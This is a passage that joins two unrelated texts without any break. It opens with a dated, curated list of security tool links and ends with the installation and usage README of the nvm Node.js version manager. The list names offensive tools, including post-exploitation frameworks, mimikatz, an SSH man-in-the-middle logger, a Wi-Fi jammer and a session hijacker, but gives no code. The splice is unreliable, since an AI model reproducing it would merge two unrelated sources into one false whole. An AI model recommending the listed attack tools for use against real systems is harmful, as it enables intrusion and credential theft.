* [mitmproxy (⭐31k)](https://github.com/mitmproxy/mitmproxy) - An interactive, SSL-capable man-in-the-middle proxy for HTTP with a console interface
* [Charles Proxy](https://charlesproxy.com) - A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic
* [usbmon](https://www.kernel.org/doc/Documentation/usb/usbmon.txt) - USB capture for Linux.
* [USBPcap (⭐786)](https://github.com/desowin/usbpcap) - USB capture for Windows.
* [dynStruct (⭐303)](https://github.com/ampotos/dynStruct) - structures recovery via dynamic instrumentation.
* [drltrace (⭐352)](https://github.com/mxmssh/drltrace) - shared library calls tracing.
### Binary files examination and editing / Hex editors
* [HxD](http://mh-nexus.de/en/hxd/) - A hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size
* [WinHex](http://www.winhex.com/winhex/) - A hexadecimal editor, helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security
* [wxHexEditor (⭐488)](https://github.com/EUA/wxHexEditor)
### Binary files examination and editing / Other
* [Binwalk (⭐9.4k)](https://github.com/ReFirmLabs/binwalk) - Detects signatures, unpacks archives, visualizes entropy.
* [Veles (⭐913)](https://github.com/codilime/veles) - a visualizer for statistical properties of blobs.
* [Protobuf inspector (⭐818)](https://github.com/jmendeth/protobuf-inspector)
* [DarunGrim (⭐359)](https://github.com/ohjeongwook/DarunGrim) - executable differ.
* [DBeaver (⭐33k)](https://github.com/dbeaver/dbeaver) - a DB editor.
* [Dependencies (⭐6.6k)](https://github.com/lucasg/Dependencies) - a FOSS replacement to Dependency Walker.
* [PEview](http://wjradburn.com/software/) - A quick and easy way to view the structure and content of 32-bit Portable Executable (PE) and Component Object File Format (COFF) files
* [BinText](https://web.archive.org/web/http://www.mcafee.com/kr/downloads/free-tools/bintext.aspx) - A small, very fast and powerful text extractor that will be of particular interest to programmers.
## [Oct 08 - Oct 14, 2018](/content/2018/41/README.md)
### tools / Other
* [empire (⭐7k)](https://github.com/EmpireProject/Empire) - A post exploitation framework for powershell and python.
* [silenttrinity (⭐2k)](https://github.com/byt3bl33d3r/SILENTTRINITY) - A post exploitation tool that uses iron python to get past powershell restrictions.
## [Oct 01 - Oct 07, 2018](/content/2018/40/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull phocean/msf` - [Docker Metasploit](https://hub.docker.com/r/phocean/msf/)
## [Aug 27 - Sep 02, 2018](/content/2018/35/README.md)
### Tools / Other
* [Nipe (⭐1.6k)](https://github.com/GouveaHeitor/nipe) - A script to make Tor Network your default gateway.
## [Jul 23 - Jul 29, 2018](/content/2018/30/README.md)
### Tools / Other
* [Amass (⭐9.6k)](https://github.com/OWASP/Amass) - In-depth subdomain enumeration tool that performs scraping, recursive brute forcing, crawling of web archives, name altering and reverse DNS sweeping
## [Jun 25 - Jul 01, 2018](/content/2018/26/README.md)
### Tools / Other
* [NoSQLMap (⭐2.4k)](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool.
* [VHostScan (⭐1.1k)](https://github.com/codingo/VHostScan) - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
* [SubFinder (⭐7.8k)](https://github.com/subfinder/subfinder) - SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.
## [Jun 18 - Jun 24, 2018](/content/2018/25/README.md)
### Competition / Other
* [ZeroDays CTF](https://zerodays.ie/)
* [Insomni’hack](https://insomnihack.ch/)
## [Jun 11 - Jun 17, 2018](/content/2018/24/README.md)
### Tools / Other
* [ssh-mitm (⭐1.5k)](https://github.com/jtesta/ssh-mitm) - An SSH/SFTP man-in-the-middle tool that logs interactive sessions and passwords.
## [May 28 - Jun 03, 2018](/content/2018/22/README.md)
### Web / Other
* [Gruyere](https://google-gruyere.appspot.com/)
* [Others](https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps)
## [May 07 - May 13, 2018](/content/2018/19/README.md)
### Tools / Other
* [Autopsy](http://www.sleuthkit.org/autopsy/) - A digital forensics platform and graphical interface to [The Sleuth Kit](http://www.sleuthkit.org/sleuthkit/index.php) and other digital forensics tools
### Bug bounty / Other
* [Awesome bug bounty resources by EdOverflow (⭐5.1k)](https://github.com/EdOverflow/bugbounty-cheatsheet)
### General / Other
* [Movies For Hackers (⭐9.7k)](https://github.com/k4m4/movies-for-hackers) - A curated list of movies every hacker & cyberpunk must watch.
## [Apr 30 - May 06, 2018](/content/2018/18/README.md)
### Tutorials
* [Understanding the basics of Linux Binary Exploitation (⭐1.2k)](https://github.com/r0hi7/BinExp)
## [Mar 26 - Apr 01, 2018](/content/2018/13/README.md)
### Web / Other
* [Hack The Box](https://www.hackthebox.eu) - a free site to perform pentesting in a variety of different systems.
## [Oct 16 - Oct 22, 2017](/content/2017/42/README.md)
### Tools / Other
* [Wifi Jammer](https://n0where.net/wifijammer/) - Free program to jam all wifi clients in range
* [Firesheep](https://codebutler.github.io/firesheep/) - Free program for HTTP session hijacking attacks.
## [Sep 11 - Sep 17, 2017](/content/2017/37/README.md)
### Tools / Other
* [Habu (⭐803)](https://github.com/portantier/habu) - Python Network Hacking Toolkit
## [May 22 - May 28, 2017](/content/2017/21/README.md)
### General / Other
* [Hack+](http://hack.plus) - An Intelligent network of bots that fetch the latest InfoSec content.
## [Mar 27 - Apr 02, 2017](/content/2017/13/README.md)
### Tools / Other
* [Paros](http://sourceforge.net/projects/paros/) - A Java-based HTTP/HTTPS proxy for assessing web application vulnerability
* [mitmsocks4j (⭐29)](https://github.com/Akdeniz/mitmsocks4j) - Man-in-the-middle SOCKS Proxy for Java
* [sleuthkit (⭐2.3k)](https://github.com/sleuthkit/sleuthkit) - A library and collection of command-line digital forensics tools
* [EnCase](https://www.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx) - The shared technology within a suite of digital investigations products by Guidance Software
* [xortool (⭐1.2k)](https://github.com/hellman/xortool) - A tool to analyze multi-byte XOR cipher
## [Feb 27 - Mar 05, 2017](/content/2017/9/README.md)
### General / Other
* [Pentest Cheat Sheets (⭐3.3k)](https://github.com/coreb1t/awesome-pentest-cheat-sheets) - Collection of cheat sheets useful for pentesting
## [Feb 13 - Feb 19, 2017](/content/2017/7/README.md)
### Online resources / Other
* [Best Linux Penetration Testing Distributions @ CyberPunk](https://n0where.net/best-linux-penetration-testing-distributions/) - Description of main penetration testing distributions
* [Security @ Distrowatch](http://distrowatch.com/search.php?category=Security) - Website dedicated to talking about, reviewing and keeping up to date with open source operating systems
## [Jan 30 - Feb 05, 2017](/content/2017/5/README.md)
### Disassemblers and debuggers
* [ScratchABit (⭐386)](https://github.com/pfalcon/ScratchABit) - Easily retargetable and hackable interactive disassembler with IDAPython-compatible plugin API
## [Jan 02 - Jan 08, 2017](/content/2017/1/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull owasp/zap2docker-stable` - [official OWASP ZAP (⭐11k)](https://github.com/zaproxy/zaproxy)
* `docker pull wpscanteam/wpscan` - [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/)
* `docker pull citizenstig/dvwa` - [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/)
* `docker pull wpscanteam/vulnerablewordpress` - [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/)
* `docker pull hmlio/vaas-cve-2014-6271` - [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/)
* `docker pull hmlio/vaas-cve-2014-0160` - [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/)
* `docker pull opendns/security-ninjas` - [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/)
* `docker pull diogomonica/docker-bench-security` - [Docker Bench for Security](https://hub.docker.com/r/diogomonica/docker-bench-security/)
* `docker pull ismisepaul/securityshepherd` - [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/)
* `docker pull danmx/docker-owasp-webgoat` - [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/)
* `docker pull citizenstig/nowasp` - [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/)
* `docker pull bkimminich/juice-shop` - [OWASP Juice Shop (⭐8.4k)](https://github.com/bkimminich/juice-shop#docker-container--)
## [Oct 31 - Nov 06, 2016](/content/2016/44/README.md)
### General / Other
* [Rookit Arsenal](https://amzn.com/144962636X) - OS RE and rootkit development
## [Jun 27 - Jul 03, 2016](/content/2016/26/README.md)
### Disassemblers and debuggers
* [plasma (⭐3k)](https://github.com/joelpx/plasma) - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
## [May 09 - May 15, 2016](/content/2016/19/README.md)
### Reverse Engineering / Other
* [Crackmes.de](http://crackmes.de/) - The world first and largest community website for crackmes and reversemes.
## [Mar 07 - Mar 13, 2016](/content/2016/10/README.md)
### Tools / Other
* [pig (⭐446)](https://github.com/rafael-santiago/pig) - A Linux packet crafting tool
## [Nov 16 - Nov 22, 2015](/content/2015/46/README.md)
### General
* [Exploit database](https://www.exploit-db.com/) - An ultimate archive of exploits and vulnerable software
### Tools / Other
* [nmap](https://nmap.org/) - Nmap (Network Mapper) is a security scanner
### Web / Other
* [0xf.at](https://0xf.at/) - a website without logins or ads where you can solve password-riddles (so called hackits).
### Competition / Other
* [PHD CTF](http://www.phdays.com/)
### General / Other
* [CTF archives (shell-storm)](http://shell-storm.org/repo/CTF/)
## [Oct 12 - Oct 18, 2015](/content/2015/41/README.md)
### Disassemblers and debuggers
* [radare2 (⭐18k)](https://github.com/radare/radare2) - A portable reversing framework
## [Dec 22 - Dec 28, 2014](/content/2014/51/README.md)
### Tutorials
* [Corelan Team's Exploit writing tutorial](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
* [Malware Analysis Tutorials: a Reverse Engineering Approach](http://fumalwareanalysis.blogspot.kr/p/malware-analysis-tutorials-reverse.html)
### Tools
* [Metasploit (⭐31k)](https://github.com/rapid7/metasploit-framework) A computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
* [mimikatz (⭐17k)](https://github.com/gentilkiwi/mimikatz) - A little tool to play with Windows security
### Disassemblers and debuggers
* [IDA](https://www.hex-rays.com/products/ida/) - IDA is a Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
* [OllyDbg](http://www.ollydbg.de/) - A 32-bit assembler level analysing debugger for Windows
### General / Other
* [Open Malware](http://www.offensivecomputing.net/)
* [CTFtime.org](https://ctftime.org/) - All about CTF (Capture The Flag)
* [WeChall](http://www.wechall.net/)
### Tools / Other
* [sqlmap (⭐27k)](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
* [tools.web-max.ca](http://tools.web-max.ca/encode_decode.php) - base64 base85 md4,5 hash, sha1 hash encoding/decoding
* [NetworkMiner](http://www.netresec.com/?page=NetworkMiner) - A Network Forensic Analysis Tool (NFAT)
* [ZAP](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) - The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications
* [Aircrack-ng](http://www.aircrack-ng.org/) - An 802.11 WEP and WPA-PSK keys cracking program
* [malzilla](http://malzilla.sourceforge.net/) - Malware hunting tool
* [John the Ripper](http://www.openwall.com/john/) - A fast password cracker
* [Aircrack](http://www.aircrack-ng.org/) - Aircrack is 802.11 WEP and WPA-PSK keys cracking program.
### System / Other
* [OverTheWire - Semtex](http://overthewire.org/wargames/semtex/)
* [OverTheWire - Vortex](http://overthewire.org/wargames/vortex/)
* [OverTheWire - Drifter](http://overthewire.org/wargames/drifter/)
* [pwnable.kr](http://pwnable.kr/) - Provide various pwn challenges regarding system security
* [Exploit Exercises - Nebula](https://exploit-exercises.com/nebula/)
* [SmashTheStack](http://smashthestack.org/)
### Reverse Engineering / Other
* [Reversing.kr](http://www.reversing.kr/) - This site tests your ability to Cracking & Reverse Code Engineering
* [CodeEngn](http://codeengn.com/challenges/) - (Korean)
* [simples.kr](http://simples.kr/) - (Korean)
### Web / Other
* [Hack This Site!](https://www.hackthissite.org/) - a free, safe and legal training ground for hackers to test and expand their hacking skills
* [Webhacking.kr](http://webhacking.kr/)
### Cryptography / Other
* [OverTheWire - Krypton](http://overthewire.org/wargames/krypton/)
### Competition / Other
* [DEF CON](https://legitbs.net/)
* [CSAW CTF](https://ctf.isis.poly.edu/)
* [hack.lu CTF](http://hack.lu/)
* [Pliad CTF](http://www.plaidctf.com/)
* [RuCTFe](http://ructf.org/e/)
* [Ghost in the Shellcode](http://ghostintheshellcode.com/)
* [SECUINSIDE CTF](http://secuinside.com/)
* [Codegate CTF](http://ctf.codegate.org/html/Main.html?lang=eng)
* [Boston Key Party CTF](http://bostonkeyparty.net/)
### tools / Other
* [SecTools](http://sectools.org/) - Top 125 Network Security Tools |
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.8-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684)
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
## Table of Contents
- [Installation](#installation)
- [Install script](#install-script)
- [Verify installation](#verify-installation)
- [Important Notes](#important-notes)
- [Git install](#git-install)
- [Manual Install](#manual-install)
- [Manual upgrade](#manual-upgrade)
- [Usage](#usage)
- [Long-term support](#long-term-support)
- [Migrating global packages while installing](#migrating-global-packages-while-installing)
- [Default global packages from file while installing](#default-global-packages-from-file-while-installing)
- [io.js](#iojs)
- [System version of node](#system-version-of-node)
- [Listing versions](#listing-versions)
- [.nvmrc](#nvmrc)
- [Deeper Shell Integration](#deeper-shell-integration)
- [zsh](#zsh)
- [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file)
- [License](#license)
- [Running tests](#running-tests)
- [Bash completion](#bash-completion)
- [Usage](#usage-1)
- [Compatibility Issues](#compatibility-issues)
- [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux)
- [Docker for development environment](#docker-for-development-environment)
- [Problems](#problems)
- [Mac OS "troubleshooting"](#mac-os-troubleshooting)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
## Installation
### Install script
To install or update nvm, you can use the [install script][2] using cURL:
```sh
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
```
or Wget:
```sh
wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
```
<sub>The script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).</sub>
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm
```
You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables.
Eg: `curl ... | NVM_DIR=/usr/local/nvm bash` for a global install.
<sub>*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*</sub>
**Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type:
```sh
command -v nvm
```
simply close your current terminal, open a new terminal, and try verifying again.
**Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:-
- your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again
- you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry.
If the above doesn't fix the problem, open your `.bash_profile` and add the following line of code:
`source ~/.bashrc`
- For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576)
### Verify installation
To verify that nvm has been installed, do:
```sh
command -v nvm
```
which should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary.
### Important Notes
If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work.
**Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us:
- [nvm-windows](https://github.com/coreybutler/nvm-windows)
- [nodist](https://github.com/marcelklehr/nodist)
**Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us:
- [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell
- [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup
- [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell
- [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish
**Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket:
- [[#900] [Bug] nodejs on FreeBSD may need to be patched ](https://github.com/creationix/nvm/issues/900)
- [nodejs/node#3716](https://github.com/nodejs/node/issues/3716)
**Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that:
- [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/)
**Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that:
- When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt`
- If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm)
- You can (but should not?) keep your previous "system" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*`
Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue.
**Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade.
**Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article.
### Git install
If you have `git` installed (requires git v1.7.10+):
1. clone this repo in the root of your user profile
- `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm`
2. `cd ~/.nvm` and check out the latest version with `git checkout v0.33.8`
3. activate nvm by sourcing it from your shell: `. nvm.sh`
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
```
### Manual Install
For a fully manual install, create a folder somewhere in your filesystem with the `nvm.sh` file inside it. I put mine in `~/.nvm` and added the following to the `nvm.sh` file.
```sh
export NVM_DIR="$HOME/.nvm" && (
git clone https://github.com/creationix/nvm.git "$NVM_DIR"
cd "$NVM_DIR"
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin`
) && . "$NVM_DIR/nvm.sh"
```
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm
```
### Manual upgrade
For manual upgrade with `git` (requires git v1.7.10+):
1. change to the `$NVM_DIR`
1. pull down the latest changes
1. check out the latest version
1. activate the new version
```sh
(
cd "$NVM_DIR"
git fetch origin
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" origin`
) && . "$NVM_DIR/nvm.sh"
```
## Usage
To download, compile, and install the latest release of node, do this:
```sh
nvm install node
```
And then in any new shell just use the installed version:
```sh
nvm use node
```
Or you can just run it:
```sh
nvm run node --version
```
Or, you can run any arbitrary command in a subshell with the desired version of node:
```sh
nvm exec 4.2 node --version
```
You can also get the path to the executable to where it was installed:
```sh
nvm which 5.0
```
In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc:
- `node`: this installs the latest version of [`node`](https://nodejs.org/en/)
- `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/)
- `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`.
- `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in semver, versions communicate breakage, not stability).
### Long-term support
Node has a [schedule](https://github.com/nodejs/LTS#lts_schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments:
- `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon`
- `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon`
- `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon`
- `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon`
- `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon`
- `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon`
- `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon`
Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported.
### Migrating global packages while installing
If you want to install a new version of Node.js and migrate npm packages from a previous version:
```sh
nvm install node --reinstall-packages-from=node
```
This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one.
You can also install and migrate npm packages from specific versions of Node like this:
```sh
nvm install 6 --reinstall-packages-from=5
nvm install v4.2 --reinstall-packages-from=iojs
```
### Default global packages from file while installing
If you have a list of default packages you want installed every time you install a new version we support that too. You can add anything npm would accept as a package argument on the command line.
```sh
# $NVM_DIR/default-packages
rimraf
[email protected]
stevemao/left-pad
```
### io.js
If you want to install [io.js](https://github.com/iojs/io.js/):
```sh
nvm install iojs
```
If you want to install a new version of io.js and migrate npm packages from a previous version:
```sh
nvm install iojs --reinstall-packages-from=iojs
```
The same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js.
### System version of node
If you want to use the system-installed version of node, you can use the special default alias "system":
```sh
nvm use system
nvm run system --version
```
### Listing versions
If you want to see what versions are installed:
```sh
nvm ls
```
If you want to see what versions are available to install:
```sh
nvm ls-remote
```
To restore your PATH, you can deactivate it:
```sh
nvm deactivate
```
To set a default Node version to be used in any new shell, use the alias 'default':
```sh
nvm alias default node
```
To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`:
```sh
export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist
nvm install node
NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2
```
To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`:
```sh
export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist
nvm install iojs-v1.0.3
NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3
```
`nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions.
### .nvmrc
You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory).
Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line.
For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory:
```sh
$ echo "5.9" > .nvmrc
$ echo "lts/*" > .nvmrc # to default to the latest LTS version
$ echo "node" > .nvmrc # to default to the latest version
```
Then when you run nvm:
```sh
$ nvm use
Found '/path/to/project/.nvmrc' with version <5.9>
Now using node v5.9.1 (npm v3.7.3)
```
`nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized.
The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required.
### Deeper Shell Integration
You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new).
If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples.
#### zsh
##### Calling `nvm use` automatically in a directory with a `.nvmrc` file
Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an
`.nvmrc` file with a string telling nvm which node to `use`:
```zsh
# place this after nvm initialization!
autoload -U add-zsh-hook
load-nvmrc() {
local node_version="$(nvm version)"
local nvmrc_path="$(nvm_find_nvmrc)"
if [ -n "$nvmrc_path" ]; then
local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")")
if [ "$nvmrc_node_version" = "N/A" ]; then
nvm install
elif [ "$nvmrc_node_version" != "$node_version" ]; then
nvm use
fi
elif [ "$node_version" != "$(nvm version default)" ]; then
echo "Reverting to nvm default version"
nvm use default
fi
}
add-zsh-hook chpwd load-nvmrc
load-nvmrc
```
## License
nvm is released under the MIT license.
Copyright (C) 2010-2017 Tim Caswell and Jordan Harband
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
## Running tests
Tests are written in [Urchin]. Install Urchin (and other dependencies) like so:
npm install
There are slow tests and fast tests. The slow tests do things like install node
and check that the right versions are used. The fast tests fake this to test
things like aliases and uninstalling. From the root of the nvm git repository,
run the fast tests like this:
npm run test/fast
Run the slow tests like this:
npm run test/slow
Run all of the tests like this:
npm test
Nota bene: Avoid running nvm while the tests are running.
## Bash completion
To activate, you need to source `bash_completion`:
```sh
[[ -r $NVM_DIR/bash_completion ]] && . $NVM_DIR/bash_completion
```
Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`).
### Usage
nvm:
> $ nvm <kbd>Tab</kbd>
```
alias deactivate install ls run unload
clear-cache exec list ls-remote unalias use
current help list-remote reinstall-packages uninstall version
```
nvm alias:
> $ nvm alias <kbd>Tab</kbd>
```
default
```
> $ nvm alias my_alias <kbd>Tab</kbd>
```
v0.6.21 v0.8.26 v0.10.28
```
nvm use:
> $ nvm use <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
nvm uninstall:
> $ nvm uninstall <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
## Compatibility Issues
`nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606))
The following are known to cause issues:
Inside `~/.npmrc`:
```sh
prefix='some/path'
```
Environment Variables:
```sh
$NPM_CONFIG_PREFIX
$PREFIX
```
Shell settings:
```sh
set -e
```
## Installing nvm on Alpine Linux
In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al).
